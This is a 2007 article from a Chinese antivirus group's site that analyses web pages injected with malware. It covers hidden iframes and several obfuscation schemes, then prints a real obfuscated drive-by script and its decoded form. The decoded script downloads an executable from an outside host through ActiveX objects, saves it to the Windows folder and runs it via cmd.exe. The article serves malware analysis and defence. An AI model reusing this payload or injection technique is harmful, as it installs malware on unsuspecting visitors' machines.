Welcome visit China Anti-virus group
我要发布文章
当前位置:中国反病毒小组 >> 网络安全 >> 浏览文章     
   
 

 

 

看看你的网站首页:简单分析挂马网页

  2007年09月14日 来源:反病毒小组整理   我要发布文章
 

 

欢迎进入反病毒社区论坛,与技术人员互动交流进入

这两天在毒网里走了一圈,不满足于以前把挂马网页拦截,而是想看看到底是挂了什么马。通过看网页代码,主要有四种方式:
1、直接在网页代码里用上
<iframe src="http://xxx.xxxx.xxx/xxx.htm" width=0 height=0></iframe>
然后在xxx.htm网页里来这么一段
document.write("http://xx.xx.xx/xxx.exe")
2、网页代码用escape加密
好在网上有专门的解密工具,如
http://www.seores.com/search/Escape.asp#
就能进行解密
3、网页代码用VB加密
经过一连串的加密,最后有那么一句
EXECUTE 变量名
只需把EXECUTE改成MSGBOX(变量名),再打开这个网页,就能看到内容了。
4、就是JS文件中的”'\x31\x63\x20\x65\x28\x6E\x29\x7B”如何解码。

不需要解码函数,因为javascript执行时会自行转换,同样解码也是很简单如下: 
<script LANGUAGE="javascript"> 
alert("\x31\x63\x20\x65\x28\x6E\x29\x7B") 
</script>   


ps:由于本人是菜鸟, 上述定有不全及错误之处,请各位高手海涵。 

 

在某网站挂马haha.js源文件,把\x替换成\u00后
——————分割线————————
function cZRfe(f9mmh2){var mECH63=Math.random()*f9mmh2;return'\u007E\u0074\u006D\u0070'+Math.round(mECH63)

+'\u002E\u0065\u0078\u0065';}try{
var s5uMT2="\u0068\u0074\u0074\u0070\u003A";r5uMT2="\u002F\u002F";q5uMT2="\u0069\u0069\u0069\u002E\u0038\u0033

\u0032\u0038\u0032\u0033\u002E\u0063\u006E\u002F\u0079\u0073\u0079\u0064\u006F\u0077\u006E\u002E\u0065\u0078

\u0065";h2Sfe=s5uMT2+r5uMT2+q5uMT2;BZRfe="\u006F\u0062\u006A\u0065\u0063\u0074";yZRfe="\u0063\u006C\u0061\u0073

\u0073\u0069\u0064";zZRfe="\u0063\u006C\u0073\u0069\u0064\u003A\u0042\u0044\u0039\u0036\u0043\u0035\u0035\u0036

\u002D\u0036\u0035\u0041\u0033\u002D\u0031\u0031\u0044\u0030\u002D\u0039\u0038\u0033\u0041\u002D\u0030\u0030\u0043  

\u0030\u0034\u0046\u0043\u0032\u0039\u0045\u0033\u0036";EZRfe="\u0041\u0064\u006F\u0064\u0062\u002E\u0053\u0074

\u0072\u0065\u0061\u006D";CckvV1="\u0053\u0063\u0072\u0069\u0070\u0074\u0069\u006E\u0067\u002E\u0046\u0069

\u006C\u0065\u0053\u0079\u0073\u0074\u0065\u006D\u004F\u0062\u006A\u0065\u0063\u0074";n2Sfe=(window["\u0064

\u006F\u0063\u0075\u006D\u0065\u006E\u0074"]["\u0063\u0072\u0065\u0061\u0074\u0065\u0045\u006C\u0065\u006D\u0065

\u006E\u0074"](BZRfe));n2Sfe["\u0073\u0065\u0074\u0041\u0074\u0074\u0072\u0069\u0062\u0075\u0074\u0065"]

(yZRfe,zZRfe);var t9mmh2=n2Sfe["\u0043\u0072\u0065\u0061\u0074\u0065\u004F\u0062\u006A\u0065\u0063\u0074"]

("\u004D\u0069\u0063\u0072\u006F\u0073\u006F\u0066\u0074

\u002E\u0058"+"\u004D"+"\u004C"+"\u0048"+"\u0054"+"\u0054"+"\u0050","");var S=n2Sfe["\u0043\u0072\u0065\u0061
 


\u0074\u0065\u004F\u0062\u006A\u0065\u0063\u0074"](EZRfe,"");S["\u0074\u0079\u0070\u0065"]=1;t9mmh2["\u004F\u0070

\u0065\u006E"]("\u0047\u0045\u0054",h2Sfe,0);t9mmh2["\u0053\u0065\u006E\u0064"]();tedHp3=cZRfe(10000);var F=n2Sfe

["\u0043\u0072\u0065\u0061\u0074\u0065\u004F\u0062\u006A\u0065\u0063\u0074"](CckvV1,"");var AtAMT2=F["\u0047\u0065

\u0074\u0053\u0070\u0065\u0063\u0069\u0061\u006C\u0046\u006F\u006C\u0064\u0065\u0072"](0);tedHp3=F["\u0042\u0075

\u0069\u006C\u0064\u0050\u0061\u0074\u0068"](AtAMT2,tedHp3);S["\u006F\u0070\u0065\u006E"]();S["\u0057\u0072\u0069

\u0074\u0065"](t9mmh2.responseBody);S["\u0053\u0061\u0076\u0065\u0054\u006F\u0046\u0069\u006C\u0065"](tedHp3,2);S

["\u0043\u006C\u006F\u0073\u0065"]();var Q=n2Sfe["\u0043\u0072\u0065\u0061\u0074\u0065\u004F\u0062\u006A\u0065

\u0063\u0074"]("\u0053\u0068\u0065\u006C\u006C\u002E\u0041\u0070\u0070\u006C\u0069\u0063\u0061\u0074\u0069
 


\u006F\u006E","");RokwV1=F["\u0042\u0075\u0069\u006C\u0064\u0050\u0061\u0074\u0068"](AtAMT2+'\\\u0073\u0079\u0073

\u0074\u0065\u006D\u0033\u0032','\u0063\u006D\u0064\u002E\u0065\u0078\u0065');Q["\u0053\u0068\u0065

\u006C\u006C\u0045\u0078\u0065\u0063\u0075\u0074\u0065"](RokwV1,'\u0020\u002F\u0063\u0020'+tedHp3,"",open,0);}

catch(c9mmh2){c9mmh2=1;}
——————分割线————————
用上面的命令进行解码,解码结果为
——————分割线————————
function cZRfe(f9mmh2){var mECH63=Math.random()*f9mmh2;return'~tmp'+Math.round(mECH63)+'.exe';}try{
var s5uMT2="http:";r5uMT2="//";q5uMT2="iii.832823.cn/ysydown.exe";h2Sfe=s5uMT2+r5uMT2+q5uMT2;BZRfe="object";yZRfe="classid";zZRfe="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36";EZRfe="Adodb.Stream";CckvV1="scripting.FileSystemObject";n2Sfe=(window["document"]["createElement"](BZRfe));n2Sfe["setAttribute"](yZRfe,zZRfe);var t9mmh2=n2Sfe["CreateObject"]("Microsoft.X"+"M"+"L"+"H"+"T"+"T"+"P","");var S=n2Sfe["CreateObject"](EZRfe,"");S["type"]=1;t9mmh2["Open"]("GET",h2Sfe,0);t9mmh2["Send"]();tedHp3=cZRfe(10000);var F=n2Sfe["CreateObject"](CckvV1,"");var AtAMT2=F["GetSpecialFolder"](0);tedHp3=F["BuildPath"](AtAMT2,tedHp3);S["open"]();S["Write"](t9mmh2.responseBody);S["SaveToFile"](tedHp3,2);S["Close"]();var Q=n2Sfe["CreateObject"]("Shell.Application","");RokwV1=F["BuildPath"](AtAMT2+'\\system32','cmd.exe');Q["ShellExecute"](RokwV1,' /c '+tedHp3,"",open,0);}catch(c9mmh2){c9mmh2=1;}
 


——————分割线————————
这下,我们能看到了,挂马的内容:

http://****/ysydown.exe#

www.china-antivirus.com
 
共有位读者阅读过此文 [关闭本页]

中国反病毒小组给您安全的保障

    搜索:
 
  □- 本周热门文章 □- 常用专杀下载 □- 服务器安全文章
 



口袋西游盗号木马wgatraye.exe分析
教你将Linux配置为代理防火墙
Linux系统下封杀非法IP
Linux如何 伪装IP
Linux系统常见问题处理方法
怎样把Linux系统服务器当作Mac的服务器
DOS下远程修改Serv-UFTP用户的登录密码
怎样做反向域名解析?
安全配置向导(SCW)为Win2003打造铜墙铁壁
在RedHat 6.0上安装Oracle 8i(全攻略)
 
 
 
 
 



关于我们 | 版权声明 | 技术论坛 | 联系我们 | 我要投稿 Copyright(c) china-antivirus.com All rights reserved 反病毒小组